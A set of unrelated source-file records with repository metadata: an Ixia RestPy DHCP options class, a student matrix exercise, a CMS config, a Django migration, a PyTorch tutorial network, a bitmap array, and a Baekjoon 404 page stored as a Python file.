# MIT LICENSE # # Copyright 1997 - 2020 by IXIA Keysight # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. import sys from ixnetwork_restpy.base import Base from ixnetwork_restpy.files import Files if sys.version_info >= (3, 5): from typing import List, Any, Union class DhcpHostsOptions(Base): """PortGroup settings placeholder for DHCPHostsPlugin. The DhcpHostsOptions class encapsulates a list of dhcpHostsOptions resources that are managed by the user. A list of resources can be retrieved from the server using the DhcpHostsOptions.find() method. The list can be managed by using the DhcpHostsOptions.add() and DhcpHostsOptions.remove() methods. """ __slots__ = () _SDM_NAME = "dhcpHostsOptions" _SDM_ATT_MAP = { "ObjectId": "objectId", } _SDM_ENUM_MAP = {} def __init__(self, parent, list_op=False): super(DhcpHostsOptions, self).__init__(parent, list_op) @property def ObjectId(self): # type: () -> str """ Returns ------- - str: Unique identifier for this object """ return self._get_attribute(self._SDM_ATT_MAP["ObjectId"]) def add(self): """Adds a new dhcpHostsOptions resource on the server and adds it to the container. Returns ------- - self: This instance with all currently retrieved dhcpHostsOptions resources using find and the newly added dhcpHostsOptions resources available through an iterator or index Raises ------ - ServerError: The server has encountered an uncategorized error condition """ return self._create(self._map_locals(self._SDM_ATT_MAP, locals())) def remove(self): """Deletes all the contained dhcpHostsOptions resources in this instance from the server. Raises ------ - NotFoundError: The requested resource does not exist on the server - ServerError: The server has encountered an uncategorized error condition """ self._delete() def find(self, ObjectId=None): # type: (str) -> DhcpHostsOptions """Finds and retrieves dhcpHostsOptions resources from the server. All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve dhcpHostsOptions resources from the server. To retrieve an exact match ensure the parameter value starts with ^ and ends with $ By default the find method takes no parameters and will retrieve all dhcpHostsOptions resources from the server. Args ---- - ObjectId (str): Unique identifier for this object Returns ------- - self: This instance with matching dhcpHostsOptions resources retrieved from the server available through an iterator or index Raises ------ - ServerError: The server has encountered an uncategorized error condition """ return self._select(self._map_locals(self._SDM_ATT_MAP, locals())) def read(self, href): """Retrieves a single instance of dhcpHostsOptions data from the server. Args ---- - href (str): An href to the instance to be retrieved Returns ------- - self: This instance with the dhcpHostsOptions resources from the server available through an iterator or index Raises ------ - NotFoundError: The requested resource does not exist on the server - ServerError: The server has encountered an uncategorized error condition """ return self._read(href) def CustomProtocolStack(self, *args, **kwargs): # type: (*Any, **Any) -> None """Executes the customProtocolStack operation on the server. Create custom protocol stack under /vport/protocolStack customProtocolStack(Arg2=list, Arg3=enum, async_operation=bool) --------------------------------------------------------------- - Arg2 (list(str)): List of plugin types to be added in the new custom stack - Arg3 (str(kAppend | kMerge | kOverwrite)): Append, merge or overwrite existing protocol stack - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete. Raises ------ - NotFoundError: The requested resource does not exist on the server - ServerError: The server has encountered an uncategorized error condition """ payload = {"Arg1": self} for i in range(len(args)): payload["Arg%s" % (i + 2)] = args[i] for item in kwargs.items(): payload[item[0]] = item[1] return self._execute( "customProtocolStack", payload=payload, response_object=None ) def DisableProtocolStack(self, *args, **kwargs): # type: (*Any, **Any) -> Union[str, None] """Executes the disableProtocolStack operation on the server. Disable a protocol under protocolStack using the class name disableProtocolStack(Arg2=string, async_operation=bool)string ------------------------------------------------------------- - Arg2 (str): Protocol class name to disable - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete. - Returns str: Status of the exec Raises ------ - NotFoundError: The requested resource does not exist on the server - ServerError: The server has encountered an uncategorized error condition """ payload = {"Arg1": self.href} for i in range(len(args)): payload["Arg%s" % (i + 2)] = args[i] for item in kwargs.items(): payload[item[0]] = item[1] return self._execute( "disableProtocolStack", payload=payload, response_object=None ) def EnableProtocolStack(self, *args, **kwargs): # type: (*Any, **Any) -> Union[str, None] """Executes the enableProtocolStack operation on the server. Enable a protocol under protocolStack using the class name enableProtocolStack(Arg2=string, async_operation=bool)string ------------------------------------------------------------ - Arg2 (str): Protocol class name to enable - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete. - Returns str: Status of the exec Raises ------ - NotFoundError: The requested resource does not exist on the server - ServerError: The server has encountered an uncategorized error condition """ payload = {"Arg1": self.href} for i in range(len(args)): payload["Arg%s" % (i + 2)] = args[i] for item in kwargs.items(): payload[item[0]] = item[1] return self._execute( "enableProtocolStack", payload=payload, response_object=None )
d3fecc8b89dd54cd773450d6b1f0371b7586260a
de24f83a5e3768a2638ebcf13cbe717e75740168
/moodledata/vpl_data/55/usersdata/67/23126/submittedfiles/av2_p3_civil.py
021be36901210757e4d1cd358ae7703c7b0c0ed6
[]
no_license
rafaelperazzo/programacao-web
95643423a35c44613b0f64bed05bd34780fe2436
170dd5440afb9ee68a973f3de13a99aa4c735d79
refs/heads/master
2021-01-12T14:06:25.773146
2017-12-22T16:05:45
2017-12-22T16:05:45
69,566,344
0
0
null
null
null
null
UTF-8
Python
false
false
379
py
# -*- coding: utf-8 -*- from __future__ import division import numpy as np n=input("Digite a dimensão da matriz:") pdp=input("Digite a posição a qual deseja pesar o valor da peça:") linha=n coluna=n a=np.zeros((linha,coluna)) for i in range (0,a.shape[0],1): for j in range (0,a.shape[1],1): a[i,j]=input("Digite um elemento para a matriz:") print a
3edb99208215975625109feab3b281a6d20663b2
c2fef17ef7644316da7f1f1d3819f67a4cdb21cb
/python/L1TCSCTF_cfi.py
444847f551d3ae500d20283e9f2b8119607e6a63
[]
no_license
rjwang/CSCTFDQM
cde5e937c3029a8309c189b20ad8253ff4e16df6
3dc419fad4f2cbf1b0cd1d4fb172a175f26d7025
refs/heads/master
2016-09-15T13:59:42.321400
2014-11-17T12:15:38
2014-11-17T12:15:38
null
0
0
null
null
null
null
UTF-8
Python
false
false
578
py
import FWCore.ParameterSet.Config as cms l1tCsctf = cms.EDAnalyzer("L1TCSCTF", #gmtProducer = cms.InputTag("gtDigis"), gmtProducer = cms.InputTag("null"), statusProducer = cms.InputTag("csctfDigis"), outputFile = cms.untracked.string(''), lctProducer = cms.InputTag("csctfDigis"), verbose = cms.untracked.bool(False), gangedME11a = cms.untracked.bool(True), trackProducer = cms.InputTag("csctfDigis"), mbProducer = cms.InputTag("csctfDigis:DT"), DQMStore = cms.untracked.bool(True), disableROOToutput = cms.untracked.bool(True) )
a4479a3d1bc8e0e338b8104a625f384ee5214c0c
47c39800fa6f928e0d13f26727ba52bda2aa6ff0
/One/migrations/0013_knowledgemediastore_m_k_ip.py
3c2b40b750f7a0ed28e290d0e62cc7022e06c04f
[ "MIT" ]
permissive
dddluke/zhihuipingtai
952ed5f9a4011cb4fb2765a0571c978af784d708
4e46e01440f8c270c05259ac0f38bd56dd04016c
refs/heads/master
2023-03-09T03:32:47.807760
2021-02-26T02:36:10
2021-02-26T02:36:10
341,816,381
0
0
null
null
null
null
UTF-8
Python
false
false
424
py
# Generated by Django 3.1.2 on 2020-10-13 08:48 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('One', '0012_solution_s_user_name'), ] operations = [ migrations.AddField( model_name='knowledgemediastore', name='m_k_ip', field=models.CharField(max_length=40, null=True), ), ]
c6c98662e4fa436e5465b70a23c3c113752a5975
1b287461e9bb550b96c1e2eff7e6c716ab7d536e
/pytorch/neuralNetwork.py
5ee68b460804d9842c9aa3027d8dfb849cc9aadf
[]
no_license
TQCAI/python-study-notebook
64b9c7bfaa6c47ef2d783aa2a36ba914d13b9db2
e0a9eee556c3da7441e5be6ee4baf16f1ae075a9
refs/heads/master
2020-05-18T19:28:27.998087
2019-05-04T10:29:10
2019-05-04T10:29:10
184,609,373
1
0
null
null
null
null
UTF-8
Python
false
false
1,820
py
import torch import torch.nn as nn import torch.nn.functional as F class Net(nn.Module): def __init__(self): super(Net, self).__init__() # 1 input image channel, 6 output channels, 5x5 square convolution # kernel self.conv1 = nn.Conv2d(1, 6, 5) self.conv2 = nn.Conv2d(6, 16, 5) # an affine operation: y = Wx + b self.fc1 = nn.Linear(16 * 5 * 5, 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) def forward(self, x): # Max pooling over a (2, 2) window x = F.max_pool2d(F.relu(self.conv1(x)), 2) # If the size is a square you can only specify a single number x = F.max_pool2d(F.relu(self.conv2(x)), 2) # resize 矩阵为向量 x = x.view(-1, self.num_flat_features(x)) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = self.fc3(x) return x def num_flat_features(self, x): size = x.size()[1:] # all dimensions except the batch dimension num_features = 1 for s in size: num_features *= s return num_features net = Net() print(net) params = list(net.parameters()) print(len(params)) print(type(params[0])) input = torch.randn(1, 1, 32, 32) out = net(input) print(out) net.zero_grad() out.backward(torch.randn(1, 10)) output = net(input) target = torch.randn(10) # a dummy target, for example target = target.view(1, -1) # make it the same shape as output criterion = nn.MSELoss() loss = criterion(output, target) print(loss) print(loss.grad_fn) net.zero_grad() # zeroes the gradient buffers of all parameters loss.backward() print('conv1.bias.grad after backward') print(net.conv1.bias.grad) learning_rate = 0.01 for f in net.parameters(): f.data.sub_(f.grad.data * learning_rate)
6ecdc9780c6cd6e6fa0b22b17660a4e8a3cd2d8a
8015f1c62a2cb4efd21aa8938336913bf8117868
/bamap/ba3689.pngMap.py
4333c396bc7970c3323a63989426ae8f56f57b9d
[]
no_license
GamerNoTitle/Beepers-and-OLED
675b5e3c179df0f0e27b42bf594c43860d03b9af
afe1340e5394ae96bda5f9022a8a66824368091e
refs/heads/master
2020-04-20T00:09:47.122471
2019-04-29T04:59:35
2019-04-29T04:59:35
168,515,579
4
2
null
null
null
null
UTF-8
Python
false
false
8,468
py
ba3689.pngMap = [ '11111111111111111111111111111111111111111111111111111111111111000000111111111111111111111111111111111111111111111111111111111111', '11111111111111111111111111111111111111111111111111111111111111000000111111111111111111111111111111111111111111111111111111111111', '11111111111111111100001111111111110001011111111111111111111111100110111111111111111111111111111111111111111111111111111111111110', '11111111111111111011101011111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111', '11111111111111111001111111111111111111111111111111110000111111111111111111111111111111111111111111111111111111111111111111111111', '11011111111111111001111111111111111111111111111111111001111111111111111111111111111111111111111111111111111111111111111111111111', '01001111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111', '01001111111111111110111111111111111111011111111111111111111111111111111111111111111111111111111111111111111111111111111111111111', '10111111111111111111111111111111111111111111111111111111111110111111111111111111111111111111111111111111111111111111111111111111', '11111111100001111111111111111111111111111111111111111111110001001111111111111111111111111111111111111111111111111111111111111111', '11111111110011111111111111111111111111111111111111111111111111001111111111111111111111111111111111111111111111111111111111111110', '11111111111001111111111111111111111111111111111111111111111111001111111111111111111111111111111111111111111111111111111111111110', '11111111111111111111111111111111111111111111111111111111111000001111111111111111111111111111111111111111111111111111111111111110', '11111111111111111111111111111111111111111111111111111111100000000111111111111111111111111111111111111111111111111111111111111111', '11111111111111111111111111111111111111111111111111111111000000000000111111111111111111111111111111111111111111111111111111111111', '11111111111111111111111111111111111111111111111111111110000000000000011111111111111111111111111111111111111111111111111111111111', '11111111111111111111111111111111100000001001111111111100000000000000001111111111111111111111111111111111111001111111111111111111', '11100111111111111111111111111111111111111111111111110100000000000000000111111111111111111111111111111111111111111111111111111111', '11101111111111111111111111111111111111111111111111100000000000000000001111111111111111111111111111111111111111111111111111111111', '11111100111111111111111111111111111111111111111111100000000000000000001111111111111111111111111111110111111111111111111111111111', '11111111111111111111111111111111111111111111111100000000000000000001111111010100000000000000111111111111111111111111111111111111', '11111111111111111111111111111111111111111111111100000000000000000000111010000000000000000001011111111111111111111111111111111111', '11111111111111111111111111111111111111111111111000000000000000000100000000000000000000000000001111111111111111111111111111111111', '11111111111111111111111111111111111111111111101100000000000000000000000000000000000000000000000011111111111111111111111111111111', '11111111111111111111111111111111111111111111001100000000000000000000000000000000000000000000000000111111111111111111111111111111', '11111111111111111111111111111111111111111110011111000000000000000000000000000000000000000000000000111111111111111111111111111111', '11111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000011111111111111111111111111', '11111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000011111111111111111111111111', '11111111111111111111111111111001111111111111111111110000000000000000000000000000000000000000000000000011110011111111111111111111', '11111111111111111111111111111101111111111111111111111100000000000000000000000000000000000000000000000111110011111111111111111111', '11111111111111111111111111111111111111111111111111111000000000000000000000000000000000000000000000000011111111111111111111111111', '11111111111111111111111111111111111111111111111111111100000000000000000000000000000000000000000000000010001111111111111111111111', '11111111111111111111111111111111111111111111111111111000000000000000000000000000000000000000000000000001001111111111111111111111', '11111111111111111111111111111111111111111111111111111000000000000000000000000000000000000000000000000001101111111111111111111111', '11111111111111111111111111111111111111111111111111111100000000000000000000000000000000000000000000000000101111111111111111111111', '11111111111111111111111111111111111111111111111111111000000000000000010000000000000000000000000000000000101111111111111111111111', '11111111111111111111001111111111111111111111111111100000000000000000000000000000000000000000000000000000111111111111111111111111', '11111111111111111111001111111111111111111111111111111100000000000000010000000000000000000000000000000000111111111111111111111111', '11111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000001101111111111111111111111', '11111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000011101111111111111111111111', '11111111111111111111111111111111111111111111111111111111000000000000000000100000000000000000000000000000111111100011111111111111', '11111111111111111111111111111111111111111111111111111100000000000000000000000000000000000000000000000000111111100011111111111111', '11111111111111111111111111111111111111111111111111110100000000000000000000000011000000000000000000001011111111100001111111111111', '11111111111111111111111111111111011111111111111111110000000000000000000011000011100000000000000000001111111111100011111111111111', '11000011111111111111111111111111001111111111111111000000000000000000000000001011010011000000000010111111111111101111111111111111', '11111111111111111111111111111111001111111111111110000000000000000000000000000011111111110000111111111111111111111111111111111111', '11111111111111111111111111111111111111111111001000000000000000000000000011111111111111111111111111111111111111111111111111111110', '11111011111111111111111111111111111111111111001000000000000000000000000011111111111111111111111111111111111111111111111111111111', '10000111111111111111111111111111111111111100000000000000000000000000000001111111111111111111111111111111111111111111111111111111', '11011111111111111111111111111111111111111100000000000000000000000000000011111111111111111111111111111111111111111111111111111111', '11111111111111111111111111111111111100000000000000000000000000000000000011111111111111111111111111111111111111111111111111111111', '11111111111111111111111111111111111000000000000000000000000000000000000001111111111111111111111111111111111111111111111111111111', '11111111111111111111111111111111110000000000000000000000000000000000000000111111111111111111111111111111111111111111111111111111', '11111111111111111111111111111111110000000000000000000000000000000000000001111111111111111111111111111111111111111011111111111111', '11111111111111111111111111111111000000000000000000000000000000000000000000111111111111111111111111111111111110000101111111111111', '11111111111111111111111111111111000000000000000000000000000000000000000000111111111111111111111111111111111111111111111111111111', '11111111111111111111111111111100000000000000000000000000000000000000000000111111111111111111111111111111111110000001111111111111', '11111111111111111111111111111110000000000000000000000000000000000000000000111111111111111111111111111111111111111111111111111111', '11111111111111111111111111111110000000000000000000000000000000000000000000001111111111111111111111111111111111111111111111111111', '11111111111111111111111111111111000000000000000000000000000000000000000000001111111111111111111111111111111111111111111111111111', '11111111111111111111111111111111110000000000000000000000000000000000000000101111111111111111111111111111111111111111111111111111', '11111111111111111111111111111111110000000000000000000000000000000000000000001111111111111111111111111111111111111111111111111111', '11111111111111111111111111111111111110000000000000000000000000000000000000001111111111111111111111111111111111110000000111111111', '11111111111111111111111111111111111111100000000000000000000000000000000000011111111111111111111111111111111111111001111111111111', ]
be374b162f988d88dda2b249e3f6c373e8addd04
0529196c4d0f8ac25afa8d657413d4fc1e6dd241
/runnie0427/10868/10868.py3.py
d822d78334509fa88d0777cfd0db8f9b9b10472d
[]
no_license
riyuna/boj
af9e1054737816ec64cbef5df4927c749808d04e
06420dd38d4ac8e7faa9e26172b30c9a3d4e7f91
refs/heads/master
2023-03-17T17:47:37.198570
2021-03-09T06:11:41
2021-03-09T06:11:41
345,656,935
0
0
null
null
null
null
UTF-8
Python
false
false
17,372
py
<!DOCTYPE html> <html lang="ko"> <head> <title>Baekjoon Online Judge</title><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta charset="utf-8"><meta name="author" content="스타트링크 (Startlink)"><meta name="keywords" content="ACM-ICPC, ICPC, 프로그래밍, 온라인 저지, 정보올림피아드, 코딩, 알고리즘, 대회, 올림피아드, 자료구조"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta property="og:type" content="website"><meta property="og:image" content="http://onlinejudgeimages.s3-ap-northeast-1.amazonaws.com/images/boj-og-1200.png"><meta property="og:site_name" content="Baekjoon Online Judge"><meta name="format-detection" content = "telephone=no"><meta name="msapplication-config" content="none"><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"><link rel="manifest" href="/site.webmanifest"><link rel="mask-icon" href="/safari-pinned-tab.svg" color="#0076c0"><meta name="msapplication-TileColor" content="#00aba9"><meta name="theme-color" content="#ffffff"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.2.0/css/bootstrap.min.css"><link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/unify/css/style.css?version=20210107"><link href="https://fonts.googleapis.com/css?family=Noto+Sans+KR:400,700|Open+Sans:400,400i,700,700i|Source+Code+Pro&amp;subset=korean" rel="stylesheet"><link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/css/connect.css?version=20210107"><link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/css/result.css?version=20210107"><link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/unify/css/custom.css?version=20210107"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.6.3/css/font-awesome.css"><link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/unify/css/theme-colors/blue.css?version=20210107"><link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/css/pace.css"> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-10874097-3"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-10874097-3'); </script> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/noty/3.1.4/noty.min.css" /><meta name="username" content=""> <link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/unify/css/pages/page_404_error.css"> </head> <body> <div class="wrapper"> <div class="header no-print"><div class="topbar"><div class="container"><ul class="loginbar pull-right"><li><a href = "/register">회원가입</a></li><li class="topbar-devider"></li><li><a href = "/login?next=%2Fsource%2Fdownload%2F16222671">로그인</a></li></ul></div></div><div class="navbar navbar-default mega-menu" role="navigation"><div class="container"><div class="navbar-header"><button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-responsive-collapse"><span class="sr-only">Toggle navigation</span><span class="fa fa-bars"></span></button><a class="navbar-brand" href="/"><img id="logo-header" src="https://d2gd6pc034wcta.cloudfront.net/images/[email protected]" alt="Logo" data-retina></a></div><div class="collapse navbar-collapse navbar-responsive-collapse"><ul class="nav navbar-nav"><li class="dropdown mega-menu-fullwidth "><a href="javascript:void(0);" class="dropdown-toggle" data-toggle="dropdown">문제</a><ul class="dropdown-menu"><li><div class="mega-menu-content"><div class="container"><div class="row equal-height"><div class="col-md-3 equal-height-in"><ul class="list-unstyled equal-height-list"><li><h3>문제</h3></li><li><a href = "/problemset">전체 문제</a></li><li><a href = "/category">문제 출처</a></li><li><a href = "/step">단계별로 풀어보기</a></li><li><a href = "/problem/tags">알고리즘 분류</a></li><li><a href = "/problem/added">새로 추가된 문제</a></li><li><a href = "/problem/added/1">새로 추가된 영어 문제</a></li><li><a href = "/problem/ranking">문제 순위</a></li></ul></div><div class="col-md-3 equal-height-in"><ul class="list-unstyled equal-height-list"><li><h3>문제</h3></li><li><a href="/problem/only">푼 사람이 한 명인 문제</a></li><li><a href="/problem/nobody">아무도 못 푼 문제</a></li><li><a href="/problem/recent/submit">최근 제출된 문제</a></li><li><a href="/problem/recent/accepted">최근 풀린 문제</a></li><li><a href="/problem/random">랜덤</a></li></ul></div><div class="col-md-3 equal-height-in"><ul class="list-unstyled equal-height-list"><li><h3>출처</h3></li><li><a href = "/category/1">ICPC</a></li><li><a href = "/category/2">Olympiad</a></li><li><a href = "/category/55">한국정보올림피아드</a></li><li><a href = "/category/57">한국정보올림피아드시․도지역본선</a></li><li><a href = "/category/318">전국 대학생 프로그래밍 대회 동아리 연합</a></li><li><a href = "/category/5">대학교 대회</a></li><li><a href = "/category/428">카카오 코드 페스티벌</a></li><li><a href = "/category/215">Coder's High</a></li></ul></div><div class="col-md-3 equal-height-in"><ul class="list-unstyled equal-height-list"><li><h3>ICPC</h3></li><li><a href = "/category/7">Regionals</a></li><li><a href = "/category/4">World Finals</a></li><li><a href = "/category/211">Korea Regional</a></li><li><a href = "/category/34">Africa and the Middle East Regionals</a></li><li><a href = "/category/10">Europe Regionals</a></li><li><a href = "/category/103">Latin America Regionals</a></li><li><a href = "/category/8">North America Regionals</a></li><li><a href = "/category/92">South Pacific Regionals</a></li></ul></div></div></div></div></li></ul></li><li><a href = "/workbook/top">문제집</a></li><li><a href = "/contest/official/list">대회<span class='badge badge-red rounded-2x'>2</span></a></li><li><a href = "/status">채점 현황</a></li><li><a href = "/ranklist">랭킹</a></li><li><a href = "/board/list/all">게시판</a></li><li><a href = "/group/list/all">그룹</a></li><li><a href = "/blog/list">블로그</a></li><li><a href = "/lectures">강의</a></li><li><a href = "/search"><i class="fa fa-search search-btn"></i></a></li></ul></div></div></div></div><form action="/logout" method="post" id="logout_form"><input type='hidden' value='%2Fsource%2Fdownload%2F16222671' name="next"></form> <div class="container content"> <div class="col-md-8 col-md-offset-2"> <div class="error-v1"> <span class="error-v1-title">404</span> <span>Not found</span> <div class="margin-bottom-20"></div> </div> <div class="text-center"> <span style="font-size:18px;">강의 슬라이드의 첨부 소스 코드가 404 에러가 뜨는 경우에는 링크를 복사/붙여넣기 해주세요.</span> </div> <div class="margin-bottom-40"></div> </div> </div> <div class="footer-v3 no-print"><div class="footer"><div class="container"><div class="row"><div class="col-sm-3 md-margin-bottom-40"><div class="thumb-headline"><h2>Baekjoon Online Judge</h2></div><ul class="list-unstyled simple-list margin-bottom-10"><li><a href="/about">소개</a></li><li><a href="/news">뉴스</a></li><li><a href="/live">생중계</a></li><li><a href="/poll">설문조사</a></li><li><a href="/blog">블로그</a></li><li><a href="/calendar">캘린더</a></li><li><a href="/donate">기부하기</a></li><li><a href="https://github.com/Startlink/BOJ-Feature-Request">기능 추가 요청</a></li><li><a href="https://github.com/Startlink/BOJ-spj">스페셜 저지 제작</a></li><li><a href="/labs">실험실</a></li></ul><div class="thumb-headline"><h2>채점 현황</h2></div><ul class="list-unstyled simple-list"><li><a href="/status">채점 현황</a></li></ul></div><div class="col-sm-3 md-margin-bottom-40"><div class="thumb-headline"><h2>문제</h2></div><ul class="list-unstyled simple-list margin-bottom-10"><li><a href="/problemset">문제</a></li><li><a href="/step">단계별로 풀어보기</a></li><li><a href="/problem/tags">알고리즘 분류</a></li><li><a href="/problem/added">새로 추가된 문제</a></li><li><a href="/problem/added/1">새로 추가된 영어 문제</a></li><li><a href="/problem/ranking">문제 순위</a></li><li><a href="/problem/recent/submit">최근 제출된 문제</a></li><li><a href="/problem/recent/accepted">최근 풀린 문제</a></li><li><a href="/change">재채점 및 문제 수정</a></li></ul><div class="thumb-headline"><h2>유저 대회 / 고등학교 대회</h2></div><ul class="list-inline simple-list margin-bottom"><li><a href="/category/353">FunctionCup</a></li><li><a href="/category/319">kriiicon</a></li><li><a href="/category/420">구데기컵</a></li><li><a href="/category/358">꼬마컵</a></li><li><a href="/category/421">네블컵</a></li><li><a href="/category/413">소프트콘</a></li><li><a href="/category/416">웰노운컵</a></li><li><a href="/category/detail/1743">HYEA Cup</a></li><li><a href="/category/364">경기과학고등학교</a></li><li><a href="/category/417">대구과학고등학교</a></li><li><a href="/category/429">부산일과학고</a></li><li><a href="/category/435">서울과학고등학교</a></li><li><a href="/category/394">선린인터넷고등학교</a></li></ul></div><div class="col-sm-3 md-margin-bottom-40"><div class="thumb-headline"><h2>출처</h2></div><ul class="list-unstyled simple-list margin-bottom-10"><li><a href="/category/1">ICPC</a></li><li><a href="/category/211">ICPC Korea Regional</a></li><li><a href="/category/2">Olympiad</a></li><li><a href="/category/55">한국정보올림피아드</a></li><li><a href="/category/57">한국정보올림피아드시․도지역본선</a></li><li><a href="/category/318">전국 대학생 프로그래밍 대회 동아리 연합</a></li><li><a href="/category/5">대학교 대회</a></li><li><a href="/category/428">카카오 코드 페스티벌</a></li><li><a href="/category/215">Coder's High</a></li></ul><div class="thumb-headline"><h2>대학교 대회</h2></div><ul class="list-inline simple-list"><li><a href="/category/320">KAIST</a></li><li><a href="/category/426">POSTECH</a></li><li><a href="/category/341">고려대학교</a></li><li><a href="/category/434">광주과학기술원</a></li><li><a href="/category/361">국민대학교</a></li><li><a href="/category/83">서강대학교</a></li><li><a href="/category/354">서울대학교</a></li><li><a href="/category/352">숭실대학교</a></li><li><a href="/category/408">아주대학교</a></li><li><a href="/category/334">연세대학교</a></li><li><a href="/category/336">인하대학교</a></li><li><a href="/category/347">전북대학교</a></li><li><a href="/category/400">중앙대학교</a></li><li><a href="/category/402">충남대학교</a></li><li><a href="/category/418">한양대 ERICA</a></li><li><a href="/category/363">홍익대학교</a></li><li><a href="/category/409">경인지역 6개대학 연합 프로그래밍 경시대회</a></li></ul></div><div class="col-sm-3 md-margin-bottom-40"><div class="thumb-headline"><h2>도움말</h2></div><ul class="list-unstyled simple-list margin-bottom-10"><li><a href="/help/judge">채점 도움말 및 채점 환경</a></li><li><a href="/help/rejudge">재채점 안내</a></li><li><a href="/help/rte">런타임 에러 도움말</a></li><li><a href="/help/problem">문제 스타일 안내</a></li><li><a href="/help/language">컴파일 또는 실행 옵션, 컴파일러 버전, 언어 도움말</a></li><li><a href="/help/workbook">문제집 도움말</a></li><li><a href="/help/contest">대회 개최 안내</a></li><li><a href="/help/problem-add">문제 출제 안내</a></li><li><a href="/help/rule">이용 규칙</a></li><li><a href="/help/stat">통계 도움말</a></li><li><a href="/help/question">질문 도움말</a></li><li><a href="/help/faq">자주묻는 질문</a></li><li><a href="/help/lecture">강의 안내</a></li><li><a href="/help/short">짧은 주소 안내</a></li><li><a href="/help/ad">광고 안내</a></li></ul></div></div></div><div class="copyright"><div class="container"><div class="row"><div class="col-md-9 col-sm-12"><p>&copy; 2021 All Rights Reserved. <a href="https://startlink.io">주식회사 스타트링크</a>&nbsp;|&nbsp;<a href="/terms">서비스 약관</a>&nbsp;|&nbsp;<a href="/privacy">개인정보 보호</a>&nbsp;|&nbsp;<a href="/terms/payment">결제 이용 약관</a>&nbsp;|&nbsp;<a href="https://boj.startlink.help/hc/ko">도움말</a>&nbsp;|&nbsp;<a href="http://startl.ink/2pmlJaY">광고 문의</a>&nbsp;|&nbsp;<a href="https://github.com/Startlink/update-note/blob/master/boj.md">업데이트 노트</a>&nbsp;|&nbsp;<a href="https://github.com/Startlink/update-note/blob/master/boj-issues.md">이슈</a>&nbsp;|&nbsp;<a href="https://github.com/Startlink/update-note/blob/master/boj-todo.md">TODO</a></p></div><div class="col-md-3 col-sm-12"><ul class="social-icons pull-right"><li><a href="https://www.facebook.com/onlinejudge" data-original-title="Facebook" class="rounded-x social_facebook"></a></li><li><a href="https://startlink.blog" data-original-title="Wordpress" class="rounded-x social_wordpress"></a></li></ul></div></div><div class="row"><div class="col-sm-12"><a href="https://startlink.io" class="hidden-xs"><img src="https://d2gd6pc034wcta.cloudfront.net/logo/startlink-logo-white-only.png" class="pull-right startlink-logo"></a><ul class="list-unstyled simple-list"><li>사업자 등록 번호: 541-88-00682</li><li>대표자명: 최백준</li><li>주소: 서울시 서초구 서초대로74길 29 서초파라곤 412호</li><li>전화번호: 02-521-0487 (이메일로 연락 주세요)</li><li>이메일: <a href="mailto:[email protected]">[email protected]</a></li><li>통신판매신고번호: 제 2017-서울서초-2193 호</li></ul></div><div class="col-xs-9"><p id="no-acm-icpc"></p></div><div class="col-xs-3"></div></div></div></div></div> </div> <div id="fb-root"></div><script> window.fbAsyncInit = function() { FB.init({ appId : '322026491226049', cookie : true, xfbml : true, version : 'v2.8' }); }; (function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/ko_KR/sdk.js"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk')); </script> <script> !function(f,b,e,v,n,t,s){ if(f.fbq)return;n=f.fbq=function(){ n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments) };if(!f._fbq)f._fbq=n; 